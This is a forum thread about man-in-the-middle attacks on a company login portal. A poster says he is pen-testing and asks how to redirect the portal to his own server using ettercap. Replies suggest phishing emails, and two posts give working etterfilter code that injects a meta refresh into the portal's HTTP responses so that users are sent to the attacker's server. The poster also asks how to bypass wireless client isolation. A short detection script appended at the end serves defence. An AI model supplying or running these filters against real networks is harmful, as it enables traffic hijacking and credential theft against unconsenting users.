Thread: Website redirection

  1. #1
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Website redirection

    Hello folks!

    I am doing a pen-test for my company on their new website access. It's a website portal: basically you go to the site, log in with your username and password, and you will have access to the whole network (not the whole network, only if you are the CTO or the network admin).

    So I was able to catch the username and password using ettercap, but they use something called Host Checker, so my question is: how can I redirect a specific website using ettercap?

    I can do ARP spoofing and it works, but, since I am doing a pen-test, the customer has an option called Host Checker. It's a little app that runs on the client machine and makes an SSL tunnel; the app checks for antivirus (if it is not up to date you won't be able to log in to their website). So, because of this app, I cannot sniff their password. So, here is my question again: how can I redirect the URL to my URL? For example, if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com; they will see the same page. Actually, I already have everything in place, but I don't know yet how to do the website redirection. Any ideas? Suggestions? I am using ettercap, but I am open to using anything to achieve this.

    Thanks!

    <-SeRVer->

  2. #2
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    15

    Quote: Originally Posted by Server
    if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com, they will see the same page, actually, I already have everything in place
    How about just mailing your victim with some fake message which says: check the new extranet (URL), but in your HTML is your URL. That's basically phishing.

    Or, if you have an account, search for HTML injection vulnerabilities and try to redirect.
    Two things are infinite: the universe and human stupidity;

  3. #3
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

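    Maybe you could try something like this:

    Code:
    # Match HTTP responses (TCP source port 80)
    if (ip.proto == TCP && tcp.src == 80) {
    # Inner double quotes are escaped so etterfilter can compile the string
    replace("</head>", "<meta http-equiv=\"Refresh\" content=\"1; url=http://myapacheserver.com\"></head>");
    msg("Filter Ran.\n");
    }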
    Of course you could also filter just for the page h**tp://access.company.com.
    Don't eat yellow snow :rolleyes:

  4. #4
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Is the AP wired or wireless?
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Thanks for the response.

    Well, they do have an AP, but they use the client isolation option (does anyone know how to break/bypass this option?).

    hawaii67, I didn't try that, because all the traffic will be redirected to my website, so if the client tries to go to google.com I don't want to see my page, only if they want to go to access.mycompany.com

    Any other ideas?

    Thanks!!!

    <-SeRVer->

  6. #6
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Here's the spoonfilter:

    Code:
    # Match only responses from the portal's IP address on TCP port 80
    if (ip.src == 'aa.bb.cc.dd' && tcp.src == 80) {
          # Inner double quotes are escaped so etterfilter can compile the string
          replace("<head>", "<head> <meta http-equiv=\"Refresh\" content=\"0; url=http://myapacheserver.com\">");
          msg("Replaced URL\n");
    }
    Where aa.bb.cc.dd is the IP address of access.company.com.
    If an nslookup reveals more IP addresses, use this instead:

    Code:
    if (ip.src == 'aa.bb.cc.dd' || ip.src == 'ee.dd.ff.gg' || ip.src == 'hh.ii.jj.kk') {

    It works fine with me :-)

    Cheers
    Don't eat yellow snow :rolleyes:
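
The filters posted in #3 and #6 leave a recognisable trace in the page a client receives: a meta refresh tag whose target is on another host. The following check for that trace is an added example, not part of the original thread; the function names and sample pages are constructed for illustration, and the hostnames are the placeholders used in the posts.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class RefreshFinder(HTMLParser):
    """Collect the target of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        # content is "<seconds>; url=<target>"; the url part is optional
        m = re.search(r"url\s*=\s*['\"]?([^'\";]+)", a.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1).strip())


def offsite_refreshes(page_url, html, allowed_hosts=()):
    """Return absolute refresh targets whose host is not the page's own
    host and not in allowed_hosts."""
    ok = {urlsplit(page_url).hostname} | {h.lower() for h in allowed_hosts}
    finder = RefreshFinder()
    finder.feed(html)
    absolute = [urljoin(page_url, t) for t in finder.targets]
    return [u for u in absolute if urlsplit(u).hostname not in ok]


# Constructed sample pages (not captured traffic).
PORTAL = "http://access.company.com/"
TAMPERED = ('<html><head> <meta http-equiv="Refresh" '
            'content="0; url=http://myapacheserver.com"><title>Portal</title>'
            '</head><body>login form</body></html>')
CLEAN = ('<html><head><meta http-equiv="refresh" content="300; url=/login">'
         '<title>Portal</title></head><body>login form</body></html>')

if __name__ == "__main__":
    for name, page in (("tampered", TAMPERED), ("clean", CLEAN)):
        print(name, offsite_refreshes(PORTAL, page))
```

A monitoring client can fetch the portal's login page from the user network segment and alert on any non-empty result. The rewrite in the thread depends on the response travelling as plain HTTP on port 80.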
